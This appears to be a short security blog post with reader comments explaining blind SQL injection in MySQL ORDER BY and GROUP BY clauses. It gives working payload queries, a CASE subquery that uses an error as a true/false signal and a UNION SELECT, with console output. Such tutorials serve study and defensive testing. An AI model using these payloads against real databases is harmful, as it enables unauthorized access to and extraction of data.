Injection in Order by, Group by Clause

<< Back to blog

Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;

+——+

| id   |

+——+

|    1 | 

+——+

1 row in set (0.00 sec)

—-

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;

ERROR 1242 (21000): Subquery returns more than 1 row

—–

For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples:  mysql> select id from news where id =1 group by id union select 2222;

+——+

| id   |

+——+

|    1 |

| 2222 | 

+——+

2 rows in set (0.00 sec) 

6 Comments

  • Lord says:

    Great. Thats exactly what I was searching for.
    Not so great: I do not understand what the example should do…

  • sid says:

    what version of the mysql are you trying this?

    I think this doesnot work in some of the recent versions

  • Lord says:

    Server Version: 5.1.30
    I meant especially the “order by”-case.
    What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?

  • sid says:

    This is how, you can convert this into standard true and false responses. Think of that error as a ‘false’ response which you get when doing boolean injection;

    e.g. id=100 and 1=1; id=100 and 1=2;

    —-

  • Lord says:

    of course -.-‘
    Thank you.

  • GDSG says:

    THANKS MAN!!!
    I try to figure this out about 2 days, cuz IF(1=1,1,1) not worked, but this ROCKS.

    Thanks Again!

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>